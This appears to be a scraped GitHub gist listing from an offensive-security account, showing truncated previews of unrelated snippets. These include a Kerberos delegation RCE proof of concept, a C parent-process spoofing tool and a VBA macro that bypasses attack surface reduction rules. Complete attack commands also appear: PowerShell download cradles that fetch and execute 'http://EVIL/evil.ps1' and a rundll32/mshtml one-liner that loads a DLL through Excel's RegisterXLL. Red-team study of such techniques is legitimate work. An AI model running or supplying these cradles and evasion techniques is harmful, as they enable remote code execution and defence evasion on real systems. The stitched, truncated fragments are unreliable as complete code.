I hereby claim:
- I am FlatL1neAPT on github.
- I am underground (https://keybase.io/underground) on keybase.
- I have a public key whose fingerprint is E8D6 2068 1BD8 05A9 874A F718 02BC 1C2C 0C68 EDD1
To claim this, I am signing this object:
#!/usr/bin/env python | |
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html | |
# this is a rough PoC | |
# requirements for RCE: | |
# - the attacker needs to either have or create an object with a service principal name | |
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account | |
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts) | |
# - NTLM has to be in use |
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
/* spoof.exe explorer.exe calc.exe */ | |
#include <windows.h> | |
#include <tlhelp32.h> | |
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
typedef struct _STARTUPINFOEX { | |
STARTUPINFO StartupInfo; | |
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
I hereby claim:
To claim this, I am signing this object:
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
REM rundll32 mshtml.dll HTA one-liner command: | |
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close(); |
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\
.
The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN
The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc
using System; | |
using System.Text; | |
using System.IO; | |
using System.Diagnostics; | |
using System.ComponentModel; | |
using System.Linq; | |
using System.Net; | |
using System.Net.Sockets; | |
/*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */ | |
#include <windows.h> | |
#include <stdio.h> | |
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)( | |
HANDLE ProcessHandle, | |
PSECURITY_DESCRIPTOR SecurityDescriptor, | |
BOOL CreateSuspended, | |
ULONG StackZeroBits, | |
PULONG StackReserved, |
> [Description] | |
> ** DISPUTED ** An issue was discovered in the org.telegram.messenger | |
> application 4.8.11 for Android. The Passcode feature allows | |
> authentication bypass via runtime manipulation that forces a certain | |
> method's return value to true. In other words, an attacker could | |
> authenticate with an arbitrary passcode. NOTE: the vendor indicates | |
> that this is not an attack of interest within the context of their | |
> threat model, which excludes Android devices on which rooting has | |
> occurred. | |
> |